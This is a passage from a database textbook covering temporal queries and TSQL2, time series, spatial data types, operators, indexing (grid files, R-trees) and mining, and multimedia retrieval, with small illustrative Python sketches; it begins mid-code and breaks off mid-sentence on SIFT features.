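def meets_before(period, other):
    # [T.Vst, T.Vet] MEETS_BEFORE [T1, T2]: T1 = T.Vet + one granule (one day here).
    (_vst, vet), (t1, _t2) = period, other
    return t1 == vet + timedelta(days=1)

v = (date(2002, 6, 1), date(2003, 5, 31))
print(overlaps(v, (date(2002, 1, 1), date(2002, 12, 31))))   # True
print(includes(v, (date(2002, 7, 1), date(2002, 7, 31))))    # True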

Additionally, operations are needed to manipulate time periods, such as computing
the union or intersection of two time periods. The results of these operations may
not themselves be periods, but rather temporal elements—a collection of one or
more disjoint time periods such that no two time periods in a temporal element are
directly adjacent. That is, for any two time periods [T1, T2] and [T3, T4] in a temporal
element, the following three conditions must hold:

■ [T1, T2] intersection [T3, T4] is empty.

■ T3 is not the time point following T2 in the given granularity.

■ T1 is not the time point following T4 in the given granularity.

The latter conditions are necessary to ensure unique representations of temporal
elements. If two time periods [T1, T2] and [T3, T4] are adjacent, they are combined

21A complete set of operations, known as Allen’s algebra (Allen, 1983), has been defined for compar-
ing time periods.
22This operation returns true if the intersection of the two periods is not empty; it has also been called
INTERSECTS_WITH.
23Here, 1 refers to one time point in the specified granularity. The MEETS operations basically specify if
one period starts immediately after another period ends.


into a single time period [T1, T4]. This is called coalescing of time periods.
Coalescing also combines intersecting time periods.
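
A minimal Python sketch of coalescing, assuming closed [start, end] periods at day granularity: after sorting by start time, any period that overlaps or is directly adjacent to its predecessor is merged into it, yielding a temporal element of disjoint, nonadjacent periods.

from datetime import date, timedelta

def coalesce(periods):
    # Merge overlapping or adjacent [start, end] periods into a temporal element.
    result = []
    for start, end in sorted(periods):
        if result and start <= result[-1][1] + timedelta(days=1):
            # Overlapping or directly adjacent: extend the previous period.
            prev_start, prev_end = result[-1]
            result[-1] = (prev_start, max(prev_end, end))
        else:
            result.append((start, end))
    return result

periods = [(date(2002, 1, 1), date(2002, 3, 31)),
           (date(2002, 4, 1), date(2002, 6, 30)),   # adjacent to the first period
           (date(2003, 1, 1), date(2003, 12, 31))]
print(coalesce(periods))   # first two periods coalesce into [2002-01-01, 2002-06-30]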

To illustrate how pure time conditions can be used, suppose a user wants to select all
employee versions that were valid at any point during 2002. The appropriate selec-
tion condition applied to the relation in Figure 8 would be

[T.Vst, T.Vet] OVERLAPS [2002-01-01, 2002-12-31]

Typically, most temporal selections are applied to the valid time dimension. For a
bitemporal database, one usually applies the conditions to the currently correct
tuples with uc as their transaction end times. However, if the query needs to be
applied to a previous database state, an AS_OF T clause is appended to the query,
which means that the query is applied to the valid time tuples that were correct in
the database at time T.

In addition to pure time conditions, other selections involve attribute and time
conditions. For example, suppose we wish to retrieve all EMP_VT tuple versions T
for employees who worked in department 5 at any time during 2002. In this case,
the condition is

[T.Vst, T.Vet] OVERLAPS [2002-01-01, 2002-12-31] AND (T.Dno = 5)
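
As a sketch, the same combined condition can be checked against an in-memory list of tuple versions; the sample rows and dictionary representation below are invented for illustration, with Vst, Vet, and Dno named as in the text.

from datetime import date

emp_vt = [
    {'Name': 'Smith', 'Dno': 5, 'Vst': date(2001, 6, 15), 'Vet': date(2002, 5, 31)},
    {'Name': 'Smith', 'Dno': 4, 'Vst': date(2002, 6, 1),  'Vet': date.max},
    {'Name': 'Wong',  'Dno': 5, 'Vst': date(2003, 8, 1),  'Vet': date.max},
]

year_2002 = (date(2002, 1, 1), date(2002, 12, 31))

# Tuple versions valid at some point during 2002 for department 5.
selected = [t for t in emp_vt
            if t['Vst'] <= year_2002[1] and t['Vet'] >= year_2002[0]   # OVERLAPS
            and t['Dno'] == 5]
print([t['Name'] for t in selected])   # ['Smith']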

Finally, we give a brief overview of the TSQL2 query language, which extends SQL
with constructs for temporal databases. The main idea behind TSQL2 is to allow
users to specify whether a relation is nontemporal (that is, a standard SQL relation)
or temporal. The CREATE TABLE statement is extended with an optional AS clause to
allow users to declare different temporal options. The following options are avail-
able:

■ AS VALID STATE <GRANULARITY> (valid time relation with valid time period)

■ AS VALID EVENT <GRANULARITY> (valid time relation with valid time point)

■ AS VALID STATE <GRANULARITY> AND TRANSACTION (bitemporal relation, valid time period)

■ AS VALID EVENT <GRANULARITY> AND TRANSACTION (bitemporal relation, valid time point)

The keywords STATE and EVENT are used to specify whether a time period or time
point is associated with the valid time dimension. In TSQL2, rather than have the
user actually see how the temporal tables are implemented (as we discussed in the
previous sections), the TSQL2 language adds query language constructs to specify
various types of temporal selections, temporal projections, temporal aggregations,
transformation among granularities, and many other concepts. The book by
Snodgrass et al. (1995) describes the language.


2.5 Time Series Data
Time series data are used very often in financial, sales, and economics applications.
They involve data values that are recorded according to a specific predefined
sequence of time points. Therefore, they are a special type of valid event data, where
the event time points are predetermined according to a fixed calendar. Consider the
example of closing daily stock prices of a particular company on the New York Stock
Exchange. The granularity here is day, but the days that the stock market is open are
known (nonholiday weekdays). Hence, it has been common to specify a computa-
tional procedure that calculates the particular calendar associated with a time
series. Typical queries on time series involve temporal aggregation over higher
granularity intervals—for example, finding the average or maximum weekly closing
stock price or the maximum and minimum monthly closing stock price from the
daily information.

As another example, consider the daily sales dollar amount at each store of a chain
of stores owned by a particular company. Again, typical temporal aggregates would
be retrieving the weekly, monthly, or yearly sales from the daily sales information
(using the sum aggregate function), or comparing same store monthly sales with
previous monthly sales, and so on.
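
A small illustration of such a temporal aggregation in plain Python: daily closing prices (invented values) are rolled up to ISO-week granularity, and the weekly maximum and average are computed from the daily information.

from datetime import date
from collections import defaultdict

daily_close = {
    date(2002, 1, 2): 30.10, date(2002, 1, 3): 30.55, date(2002, 1, 4): 29.80,
    date(2002, 1, 7): 31.00, date(2002, 1, 8): 31.25, date(2002, 1, 9): 30.90,
}

weekly = defaultdict(list)
for day, price in daily_close.items():
    year, week, _ = day.isocalendar()          # group trading days by ISO year and week
    weekly[(year, week)].append(price)

for (year, week), prices in sorted(weekly.items()):
    print(year, week, 'max =', max(prices), 'avg =', round(sum(prices) / len(prices), 2))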

Because of the specialized nature of time series data and the lack of support for it in
older DBMSs, it has been common to use specialized time series management sys-
tems rather than general-purpose DBMSs for managing such information. In such
systems, it has been common to store time series values in sequential order in a file,
and apply specialized time series procedures to analyze the information. The prob-
lem with this approach is that the full power of high-level querying in languages
such as SQL will not be available in such systems.

More recently, some commercial DBMS packages are offering time series exten-
sions, such as the Oracle time cartridge and the time series data blade of Informix
Universal Server. In addition, the TSQL2 language provides some support for time
series in the form of event tables.

3 Spatial Database Concepts24

3.1 Introduction to Spatial Databases
Spatial databases incorporate functionality that provides support for databases that
keep track of objects in a multidimensional space. For example, cartographic data-
bases that store maps include two-dimensional spatial descriptions of their
objects—from countries and states to rivers, cities, roads, seas, and so on. The sys-
tems that manage geographic data and related applications are known as

24The contribution of Pranesh Parimala Ranganathan to this section is appreciated.


Table 1   Common Types of Analysis for Spatial Data

Analysis Type                   Type of Operations and Measurements
Measurements                    Distance, perimeter, shape, adjacency, and direction
Spatial analysis/statistics     Pattern, autocorrelation, and indexes of similarity
                                and topology using spatial and nonspatial data
Flow analysis                   Connectivity and shortest path
Location analysis               Analysis of points and lines within a polygon
Terrain analysis                Slope/aspect, catchment area, drainage network
Search                          Thematic search, search by region

Geographical Information Systems (GIS), and they are used in areas such as envi-
ronmental applications, transportation systems, emergency response systems, and
battle management. Other databases, such as meteorological databases for weather
information, are three-dimensional, since temperatures and other meteorological
information are related to three-dimensional spatial points. In general, a spatial
database stores objects that have spatial characteristics that describe them and that
have spatial relationships among them. The spatial relationships among the objects
are important, and they are often needed when querying the database. Although a
spatial database can in general refer to an n-dimensional space for any n, we will
limit our discussion to two dimensions as an illustration.

A spatial database is optimized to store and query data related to objects in space,
including points, lines and polygons. Satellite images are a prominent example of
spatial data. Queries posed on these spatial data, where predicates for selection deal
with spatial parameters, are called spatial queries. For example, “What are the
names of all bookstores within five miles of the College of Computing building at
Georgia Tech?” is a spatial query. Whereas typical databases process numeric and
character data, additional functionality needs to be added for databases to process
spatial data types. A query such as “List all the customers located within twenty
miles of company headquarters” will require the processing of spatial data types
typically outside the scope of standard relational algebra and may involve consult-
ing an external geographic database that maps the company headquarters and each
customer to a 2-D map based on their address. Effectively, each customer will be
associated with a <latitude, longitude> position. A traditional B+-tree index based on
customers’ zip codes or other nonspatial attributes cannot be used to process this
query since traditional indexes are not capable of ordering multidimensional coor-
dinate data. Therefore, there is a special need for databases tailored for handling
spatial data and spatial queries.

Table 1 shows the common analytical operations involved in processing geographic
or spatial data.25 Measurement operations are used to measure some global prop-

25List of GIS analysis operations as proposed in Albrecht (1996).


erties of single objects (such as the area, the relative size of an object’s parts, com-
pactness, or symmetry), and to measure the relative position of different objects in
terms of distance and direction. Spatial analysis operations, which often use statis-
tical techniques, are used to uncover spatial relationships within and among mapped
data layers. An example would be to create a map—known as a prediction map—
that identifies the locations of likely customers for particular products based on the
historical sales and demographic information. Flow analysis operations help in
determining the shortest path between two points and also the connectivity among
nodes or regions in a graph. Location analysis aims to find if the given set of points
and lines lie within a given polygon (location). The process involves generating a
buffer around existing geographic features and then identifying or selecting features
based on whether they fall inside or outside the boundary of the buffer. Digital ter-
rain analysis is used to build three-dimensional models, where the topography of a
geographical location can be represented with an x, y, z data model known as Digital
Terrain (or Elevation) Model (DTM/DEM). The x and y dimensions of a DTM rep-
resent the horizontal plane, and z represents spot heights for the respective x, y coor-
dinates. Such models can be used for analysis of environmental data or during the
design of engineering projects that require terrain information. Spatial search
allows a user to search for objects within a particular spatial region. For example,
thematic search allows us to search for objects related to a particular theme or class,
such as “Find all water bodies within 25 miles of Atlanta” where the class is water.

There are also topological relationships among spatial objects. These are often used
in Boolean predicates to select objects based on their spatial relationships. For
example, if a city boundary is represented as a polygon and freeways are represented
as multilines, a condition such as “Find all freeways that go through Arlington,
Texas” would involve an intersects operation, to determine which freeways (lines)
intersect the city boundary (polygon).
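
As one possible way to evaluate such a predicate outside the DBMS, the shapely geometry library can test intersects directly between a line and a polygon; the coordinates below are invented for illustration.

from shapely.geometry import LineString, Polygon

# City boundary as a polygon and freeways as lines (coordinates are invented).
arlington = Polygon([(0, 0), (10, 0), (10, 8), (0, 8)])
freeway_i30 = LineString([(-5, 4), (15, 5)])
local_road = LineString([(20, 20), (30, 25)])

print(freeway_i30.intersects(arlington))   # True: the freeway goes through the city
print(local_road.intersects(arlington))    # False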

3.2 Spatial Data Types and Models
This section briefly describes the common data types and models for storing spatial
data. Spatial data comes in three basic forms. These forms have become a de facto
standard due to their wide use in commercial systems.

■ Map Data26 includes various geographic or spatial features of objects in a
map, such as an object’s shape and the location of the object within the map.
The three basic types of features are points, lines, and polygons (or areas).
Points are used to represent spatial characteristics of objects whose locations
correspond to a single 2-d coordinate (x, y, or longitude/latitude) in the scale
of a particular application. Depending on the scale, some examples of point
objects could be buildings, cellular towers, or stationary vehicles. Moving

26These types of geographic data are based on ESRI’s guide to GIS. See
www.gis.com/implementing_gis/data/data_types.html


vehicles and other moving objects can be represented by a sequence of point
locations that change over time. Lines represent objects having length, such
as roads or rivers, whose spatial characteristics can be approximated by a
sequence of connected lines. Polygons are used to represent spatial charac-
teristics of objects that have a boundary, such as countries, states, lakes, or
cities. Notice that some objects, such as buildings or cities, can be repre-
sented as either points or polygons, depending on the scale of detail.

■ Attribute data is the descriptive data that GIS systems associate with map
features. For example, suppose that a map contains features that represent
counties within a US state (such as Texas or Oregon). Attributes for each
county feature (object) could include population, largest city/town, area in
square miles, and so on. Other attribute data could be included for other fea-
tures in the map, such as states, cities, congressional districts, census tracts,
and so on.

■ Image data includes data such as satellite images and aerial photographs,
which are typically created by cameras. Objects of interest, such as buildings
and roads, can be identified and overlaid on these images. Images can also be
attributes of map features. One can add images to other map features so that
clicking on the feature would display the image. Aerial and satellite images
are typical examples of raster data.

Models of spatial information are sometimes grouped into two broad categories:
field and object. A spatial application (such as remote sensing or highway traffic con-
trol) is modeled using either a field- or an object-based model, depending on the
requirements and the traditional choice of model for the application. Field models
are often used to model spatial data that is continuous in nature, such as terrain ele-
vation, temperature data, and soil variation characteristics, whereas object models
have traditionally been used for applications such as transportation networks, land
parcels, buildings, and other objects that possess both spatial and non-spatial attrib-
utes.

3.3 Spatial Operators
Spatial operators are used to capture all the relevant geometric properties of objects
embedded in the physical space and the relations between them, as well as to
perform spatial analysis. Operators are classified into three broad categories.

■ Topological operators. Topological properties are invariant when topologi-
cal transformations are applied. These properties do not change after trans-
formations like rotation, translation, or scaling. Topological operators are
hierarchically structured in several levels, where the base level offers opera-
tors the ability to check for detailed topological relations between regions
with a broad boundary, and the higher levels offer more abstract operators
that allow users to query uncertain spatial data independent of the underly-
ing geometric data model. Examples include open (region), close (region),
and inside (point, loop).


■ Projective operators. Projective operators, such as convex hull, are used to
express predicates about the concavity/convexity of objects as well as other
spatial relations (for example, being inside the concavity of a given object).

■ Metric operators. Metric operators provide a more specific description of
the object’s geometry. They are used to measure some global properties of
single objects (such as the area, relative size of an object’s parts, compactness,
and symmetry), and to measure the relative position of different objects in
terms of distance and direction. Examples include length (arc) and distance
(point, point).

Dynamic Spatial Operators. The operations performed by the operators men-
tioned above are static, in the sense that the operands are not affected by the appli-
cation of the operation. For example, calculating the length of the curve has no
effect on the curve itself. Dynamic operations alter the objects upon which the
operations act. The three fundamental dynamic operations are create, destroy, and
update. A representative example of dynamic operations would be updating a spa-
tial object that can be subdivided into translate (shift position), rotate (change ori-
entation), scale up or down, reflect (produce a mirror image), and shear (deform).
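
A sketch of the geometric core of these dynamic operations, applied to a polygon held as a plain list of (x, y) vertices (no particular spatial library is assumed):

import math

def translate(vertices, dx, dy):
    return [(x + dx, y + dy) for x, y in vertices]

def scale(vertices, factor):
    return [(x * factor, y * factor) for x, y in vertices]

def rotate(vertices, angle_degrees):
    # Rotate around the origin; a real system would rotate around a chosen anchor point.
    a = math.radians(angle_degrees)
    return [(x * math.cos(a) - y * math.sin(a),
             x * math.sin(a) + y * math.cos(a)) for x, y in vertices]

square = [(0, 0), (1, 0), (1, 1), (0, 1)]
print(translate(square, 2, 3))
print(rotate(scale(square, 2), 90))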

Spatial Queries. Spatial queries are requests for spatial data that require the use
of spatial operations. The following categories illustrate three typical types of spatial
queries:

■ Range query. Finds the objects of a particular type that are within a given
spatial area or within a particular distance from a given location. (For exam-
ple, find all hospitals within the Metropolitan Atlanta city area, or find all
ambulances within five miles of an accident location.)

■ Nearest neighbor query. Finds an object of a particular type that is closest to
a given location. (For example, find the police car that is closest to the loca-
tion of crime.)

■ Spatial joins or overlays. Typically joins the objects of two types based on
some spatial condition, such as the objects intersecting or overlapping spa-
tially or being within a certain distance of one another. (For example, find all
townships located on a major highway between two cities or find all homes
that are within two miles of a lake.)
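
A naive Python sketch of the first two query types above, run over a small in-memory set of point objects (the hospital coordinates are invented; a real system would use a spatial index rather than a linear scan):

import math

hospitals = {'Grady': (3.0, 4.0), 'Emory': (8.5, 2.0), 'Piedmont': (1.0, 9.5)}

def distance(p, q):
    return math.hypot(p[0] - q[0], p[1] - q[1])

def range_query(objects, center, radius):
    # All objects within a given distance of a location.
    return [name for name, loc in objects.items() if distance(loc, center) <= radius]

def nearest_neighbor(objects, point):
    # The single object closest to the given location.
    return min(objects, key=lambda name: distance(objects[name], point))

accident = (2.0, 5.0)
print(range_query(hospitals, accident, 5.0))   # hospitals within 5 units
print(nearest_neighbor(hospitals, accident))   # closest hospital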

3.4 Spatial Data Indexing
A spatial index is used to organize objects into a set of buckets (which correspond
to pages of secondary memory), so that objects in a particular spatial region can be
easily located. Each bucket has a bucket region, a part of space containing all objects
stored in the bucket. The bucket regions are usually rectangles; for point data struc-
tures, these regions are disjoint and they partition the space so that each point
belongs to precisely one bucket. There are essentially two ways of providing a spatial
index.


1. Specialized indexing structures that allow efficient search for data objects
based on spatial search operations are included in the database system. These
indexing structures would play a similar role to that performed by B+-tree
indexes in traditional database systems. Examples of these indexing struc-
tures are grid files and R-trees. Special types of spatial indexes, known as
spatial join indexes, can be used to speed up spatial join operations.

2. Instead of creating brand new indexing structures, the two-dimensional
(2-d) spatial data is converted to single-dimensional (1-d) data, so that tra-
ditional indexing techniques (B+-tree) can be used. The algorithms
for converting from 2-d to 1-d are known as space filling curves. We will
not discuss these methods in detail (see the Selected Bibliography for further
references).

We give an overview of some of the spatial indexing techniques next.

Grid Files. Grid files are used for indexing of data on multiple attributes. They can
also be used for indexing 2-dimensional and higher n-dimensional spatial data. The
fixed-grid method divides an n-dimensional hyperspace into equal size buckets.
The data structure that implements the fixed grid is an n-dimensional array. The
objects whose spatial locations lie within a cell (totally or partially) can be stored in
a dynamic structure to handle overflows. This structure is useful for uniformly dis-
tributed data like satellite imagery. However, the fixed-grid structure is rigid, and its
directory can be sparse and large.
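
A minimal sketch of the fixed-grid idea for 2-d point data: space is divided into equal-size cells, each cell acts as a bucket, and a point lookup examines only the bucket whose region covers the point. The cell size and sample objects below are illustrative.

from collections import defaultdict

CELL_SIZE = 10.0

def cell_of(x, y):
    # Map a point to the grid cell (bucket region) that contains it.
    return (int(x // CELL_SIZE), int(y // CELL_SIZE))

grid = defaultdict(list)   # bucket region -> objects stored in that bucket

def insert(grid, obj_id, x, y):
    grid[cell_of(x, y)].append((obj_id, x, y))

def search_cell(grid, x, y):
    # Only the single bucket covering (x, y) has to be examined.
    return grid[cell_of(x, y)]

insert(grid, 'tower_17', 12.5, 3.0)
insert(grid, 'tower_42', 14.0, 7.5)
insert(grid, 'tower_90', 55.0, 61.0)
print(search_cell(grid, 13.0, 5.0))   # both towers stored in cell (1, 0)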

R-Trees. The R-tree is a height-balanced tree, which is an extension of the B+-tree
for k-dimensions, where k > 1. For two dimensions (2-d), spatial objects are approx-
imated in the R-tree by their minimum bounding rectangle (MBR), which is the
smallest rectangle, with sides parallel to the coordinate system (x and y) axes, that
contains the object. R-trees are characterized by the following properties, which are
similar to the properties for B+-trees but are adapted to 2-d spatial objects. We use
M to indicate the maximum number of entries that can fit in an R-tree node.

1. The structure of each index entry (or index record) in a leaf node is (I,
object-identifier), where I is the MBR for the spatial object whose identifier is
object-identifier.

2. Every node except the root node must be at least half full. Thus, a leaf node
that is not the root should contain m entries (I, object-identifier) where M/2
<= m <= M. Similarly, a non-leaf node that is not the root should contain m
entries (I, child-pointer) where M/2 <= m <= M, and I is the MBR that contains
the union of all the rectangles in the node pointed at by child-pointer.

3. All leaf nodes are at the same level, and the root node should have at least
two pointers unless it is a leaf node.

4. All MBRs have their sides parallel to the axes of the global coordinate system.

Other spatial storage structures include quadtrees and their variations. Quadtrees
generally divide each space or subspace into equally sized areas, and proceed with
the subdivisions of each subspace to identify the positions of various objects.
Recently, many newer spatial access structures have been proposed, and this area
remains an active research area.

Spatial Join Index. A spatial join index precomputes a spatial join operation and
stores the pointers to the related objects in an index structure. Join indexes improve
the performance of recurring join queries over tables that have low update rates.
Spatial join conditions are used to answer queries such as “Create a list of
highway-river combinations that cross.” The spatial join is used to identify and
retrieve these pairs of objects that satisfy the cross spatial relationship. Because
computing the results of spatial relationships is generally time consuming, the
result can be computed once and stored in a table that has the pairs of object
identifiers (or tuple ids) that satisfy the spatial relationship, which is essentially the
join index.

A join index can be described by a bipartite graph G = (V1, V2, E), where V1
contains the tuple ids of relation R, and V2 contains the tuple ids of relation S. The
edge set E contains an edge (vr, vs) for vr in R and vs in S, if there is a tuple
corresponding to (vr, vs) in the join index. The bipartite graph models all of the
related tuples as connected vertices in the graphs. Spatial join indexes are used in
operations (see Section 3.3) that involve computation of relationships among
spatial objects.

3.5 Spatial Data Mining
Spatial data tends to be highly correlated. For example, people with similar
characteristics, occupations, and backgrounds tend to cluster together in the same
neighborhoods. The three major spatial data mining techniques are spatial
classification, spatial association, and spatial clustering.

■ Spatial classification. The goal of classification is to estimate the value of an
attribute of a relation based on the value of the relation’s other attributes. An
example of the spatial classification problem is determining the locations of nests
in a wetland based on the value of other attributes (for example, vegetation
durability and water depth); it is also called the location prediction problem.
Similarly, where to expect hotspots in crime activity is also a location prediction
problem.

■ Spatial association. Spatial association rules are defined in terms of spatial
predicates rather than items. A spatial association rule is of the form
P1 ^ P2 ^ ... ^ Pn ⇒ Q1 ^ Q2 ^ ... ^ Qm, where at least one of the Pi’s or Qj’s is a
spatial predicate.
For example, the rule

is_a(x, country) ^ touches(x, Mediterranean) ⇒ is_a(x, wine-exporter)

(that is, a country that is adjacent to the Mediterranean Sea is typically a wine
exporter) is an example of an association rule, which will have a certain support s
and confidence c.27

Spatial colocation rules attempt to generalize association rules to point to
collection data sets that are indexed by space. There are several crucial differences
between spatial and nonspatial associations including:

1. The notion of a transaction is absent in spatial situations, since data is
embedded in continuous space. Partitioning space into transactions would lead to
an overestimate or an underestimate of interest measures, for example, support or
confidence.

2. Size of item sets in spatial databases is small, that is, there are many fewer items
in the item set in a spatial situation than in a nonspatial situation. In most
instances, spatial items are a discrete version of continuous variables. For example,
in the United States income regions may be defined as regions where the mean
yearly income is within certain ranges, such as below $40,000, from $40,000 to
$100,000, and above $100,000.

■ Spatial clustering attempts to group database objects so that the most similar
objects are in the same cluster, and objects in different clusters are as dissimilar as
possible. One application of spatial clustering is to group together seismic events in
order to determine earthquake faults. An example of a spatial clustering algorithm
is density-based clustering, which tries to find clusters based on the density of data
points in a region. These algorithms treat clusters as dense regions of objects in the
data space. Two variations of these algorithms are density-based spatial clustering
of applications with noise (DBSCAN)28 and density-based clustering (DENCLUE).29
DBSCAN is a density-based clustering algorithm because it finds a number of
clusters starting from the estimated density distribution of corresponding nodes.

27Concepts of support and confidence for association rules are often discussed as part of data mining.
28DBSCAN was proposed by Martin Ester, Hans-Peter Kriegel, Jörg Sander, and Xiaowei Xu (1996).
29DENCLUE was proposed by Hinnenberg and Gabriel (2007).

3.6 Applications of Spatial Data
Spatial data management is useful in many disciplines, including geography,
remote sensing, urban planning, and natural resource management. Spatial
database management is playing an important role in the solution of challenging
scientific problems such as global climate change and genomics. Due to the spatial
nature of genome data, GIS and spatial database management systems have a large
role to play in the area of bioinformatics. Some of the typical applications include
pattern recognition (for example, to check if the topology of a particular gene in
the genome is found in any other sequence feature map in the database), genome
browser development, and visualization maps.

Another important application area of spatial data mining is spatial outlier
detection. A spatial outlier is a spatially referenced object whose nonspatial
attribute values are significantly different from those of other spatially referenced
objects in its spatial neighborhood. For example, if a neighborhood of older houses
has just one brand-new house, that house would be an outlier based on the
nonspatial attribute ‘house_age’.
Detecting spatial outliers is useful in many applications of geographic information
systems and spatial databases. These application domains include transportation,
ecology, public safety, public health, climatology, and location-based services.

4 Multimedia Database Concepts
Multimedia databases provide features that allow users to store and query different
types of multimedia information, which includes images (such as photos or
drawings), video clips (such as movies, newsreels, or home videos), audio clips
(such as songs, phone messages, or speeches), and documents (such as books or
articles). The main types of database queries that are needed involve locating
multimedia sources that contain certain objects of interest. For example, one may
want to locate all video clips in a video database that include a certain person, say
Michael Jackson. One may also want to retrieve video clips based on certain
activities included in them, such as video clips where a soccer goal is scored by a
certain player or team.

The above types of queries are referred to as content-based retrieval, because the
multimedia source is being retrieved based on its containing certain objects or
activities. Hence, a multimedia database must use some model to organize and
index the multimedia sources based on their contents. Identifying the contents of
multimedia sources is a difficult and time-consuming task. There are two main
approaches. The first is based on automatic analysis of the multimedia sources to
identify certain mathematical characteristics of their contents. This approach uses
different techniques depending on the type of multimedia source (image, video,
audio, or text). The second approach depends on manual identification of the
objects and activities of interest in each multimedia source and on using this
information to index the sources. This approach can be applied to all multimedia
sources, but it requires a manual preprocessing phase where a person has to scan
each multimedia source to identify and catalog the objects and activities it contains
so that they can be used to index the sources.

In the first part of this section, we will briefly discuss some of the characteristics of
each type of multimedia source—images, video, audio, and text/documents. Then
we will discuss approaches for automatic analysis of images followed by the
problem of object recognition in images. We end this section with some remarks
on analyzing audio sources.

An image is typically stored either in raw form as a set of pixel or cell values, or in
compressed form to save space. The image shape descriptor describes the geometric
shape of the raw image, which is typically a rectangle of cells of a certain width and
height. Hence, each image can be represented by an m by n grid of cells. Each cell
contains a pixel value that describes the cell content. In black-and-white images,
pixels can be one bit. In gray scale or color images, a pixel is multiple bits. Because
images may require large amounts of space, they are often stored in compressed
form. Compression standards, such as GIF, JPEG, or MPEG, use various
mathematical transformations to reduce the number of cells stored but still
maintain the main image characteristics. Applicable mathematical transforms
include Discrete Fourier Transform (DFT), Discrete Cosine Transform (DCT), and
wavelet transforms.
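
As a small illustration of this raw representation, a grayscale image can be held as an m-by-n grid of cells, and a simple content descriptor such as a coarse intensity histogram can be computed directly from the pixel values (the tiny image below is invented):

from collections import Counter

# A 3-by-4 grayscale image: each cell holds one pixel value (0-255).
image = [
    [ 12,  12, 200, 200],
    [ 12,  13, 199, 201],
    [ 11,  12, 198, 200],
]

m, n = len(image), len(image[0])
histogram = Counter(pixel // 64 for row in image for pixel in row)   # 4 coarse intensity bins
print(m, n, dict(histogram))   # {0: 6, 3: 6}: half dark pixels, half bright pixels
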
To identify objects of interest in an image, the image is typically divided into
homogeneous segments using a homogeneity predicate. For example, in a color
image, adjacent cells that have similar pixel values are grouped into a segment. The
homogeneity predicate defines conditions for automatically grouping those cells.
Segmentation and compression can hence identify the main characteristics of an
image.

A typical image database query would be to find images in the database that are
similar to a given image. The given image could be an isolated segment that
contains, say, a pattern of interest, and the query is to locate other images that
contain that same pattern. There are two main techniques for this type of search.
The first approach uses a distance function to compare the given image with the
stored images and their segments. If the distance value returned is small, the
probability of a match is high. Indexes can be created to group stored images that
are close in the distance metric so as to limit the search space. The second
approach, called the transformation approach, measures image similarity by having
a small number of transformations that can change one image’s cells to match the
other image. Transformations include rotations, translations, and scaling. Although
the transformation approach is more general, it is also more time-consuming and
difficult.

A video source is typically represented as a sequence of frames, where each frame is
a still image. However, rather than identifying the objects and activities in every
individual frame, the video is divided into video segments, where each segment
comprises a sequence of contiguous frames that includes the same objects/activities.
Each segment is identified by its starting and ending frames. The objects and
activities identified in each video segment can be used to index the segments. An
indexing technique called frame segment trees has been proposed for video
indexing. The index includes both objects, such as persons, houses, and cars, as well
as activities, such as a person delivering a speech or two people talking. Videos are
also often compressed using standards such as MPEG.

Audio sources include stored recorded messages, such as speeches, class
presentations, or even surveillance recordings of phone messages or conversations
by law enforcement. Here, discrete transforms can be used to identify the main
characteristics of a certain person’s voice in order to have similarity-based indexing
and retrieval. We will briefly comment on their analysis in Section 4.4.

A text/document source is basically the full text of some article, book, or magazine.
These sources are typically indexed by identifying the keywords that appear in the
text and their relative frequencies. However, filler words or common words called
stopwords are eliminated from the process. Because there can be many keywords
when attempting to index a collection of documents, techniques have been
developed to reduce the number of keywords to those that are most relevant to the
collection. A dimensionality reduction technique called singular value
decomposition (SVD), which is based on matrix transformations, can be used for
this purpose. An indexing technique called telescoping vector trees (TV-trees) can
then be used to group similar documents.

4.1 Automatic Analysis of Images
Analysis of multimedia sources is critical to support any type of query or search
interface.
We need to represent multimedia source data such as images in terms of features
that would enable us to define similarity. The work done so far in this area uses
low-level visual features such as color, texture, and shape, which are directly related
to the perceptual aspects of image content. These features are easy to extract and
represent, and it is convenient to design similarity measures based on their
statistical properties.

Color is one of the most widely used visual features in content-based image
retrieval since it does not depend upon image size or orientation. Retrieval based
on color similarity is mainly done by computing a color histogram for each image
that identifies the proportion of pixels within an image for the three color channels
(red, green, blue—RGB). However, RGB representation is affected by the
orientation of the object with respect to illumination and camera direction.
Therefore, current image retrieval techniques compute color histograms using
competing invariant representations such as HSV (hue, saturation, value). HSV
describes colors as points in a cylinder whose central axis ranges from black at the
bottom to white at the top with neutral colors between them. The angle around the
axis corresponds to the hue, the distance from the axis corresponds to the
saturation, and the distance along the axis corresponds to the value (brightness).

Texture refers to the patterns in an image that present the properties of
homogeneity that do not result from the presence of a single color or intensity
value. Examples of texture classes are rough and silky. Examples of textures that
can be identified include pressed calf leather, straw matting, cotton canvas, and so
on. Just as pictures are represented by arrays of pixels (picture elements), textures
are represented by arrays of texels (texture elements). These textures are then
placed into a number of sets, depending on how many textures are identified in the
image. These sets not only contain the texture definition but also indicate where in
the image the texture is located. Texture identification is primarily done by
modeling it as a two-dimensional, gray-level variation. The relative brightness of
pairs of pixels is computed to estimate the degree of contrast, regularity,
coarseness, and directionality.

Shape refers to the shape of a region within an image. It is generally determined by
applying segmentation or edge detection to an image. Segmentation is a
region-based approach that uses an entire region (sets of pixels), whereas edge
detection is a boundary-based approach that uses only the outer boundary
characteristics of entities. Shape representation is typically required to be invariant
to translation, rotation, and scaling. Some well-known methods for shape
representation include Fourier descriptors and moment invariants.

4.2 Object Recognition in Images
Object recognition is the task of identifying real-world objects in an image or a
video sequence. The system must be able to identify the object even when the
images of the object vary in viewpoints, size, scale, or even when they are rotated or
translated. Some approaches have been developed to divide the original image into
regions based on similarity of contiguous pixels. Thus, in a given image showing a
tiger in the jungle, a tiger subimage may be detected against the background of the
jungle, and when compared with a set of training images, it may be tagged as a
tiger.

The representation of the multimedia object in an object model is extremely
important. One approach is to divide the image into homogeneous segments using
a homogeneity predicate. For example, in a colored image, adjacent cells that have
similar pixel values are grouped into a segment. The homogeneity predicate defines
conditions for automatically grouping those cells. Segmentation and compression
can hence identify the main characteristics of an image. Another approach finds
measurements of the object that are invariant to transformations. It is impossible
to keep a database of examples of all the different transformations of an image. To
deal with this, object recognition approaches find interesting points (or features) in
an image that are invariant to transformations.

An important contribution to this field was made by Lowe,30 who used
scale-invariant features from images to perform reliable object recognition. This
approach is called scale-invariant feature transform (SIFT). The SIFT features are
invariant to image scaling and rotation, and partially invariant to change in
illumination and 3D camera viewpoint. They are well localized in both the spatial
and frequency domains, reducing the probability of disruption by occlusion,
clutter, or noise. In addition, the features are highly distinctive, which allows a
single feature to be correctly matched with high probability against a large
database of features, providing a basis for object and scene recognition.

For image matching and recognition, SIFT features (also known as keypoint
features) are first extracted from a set of reference images and stored in a database.
Object recognition is then performed by comparing each feature from the new
image with the features stored in the database and finding candidate matching
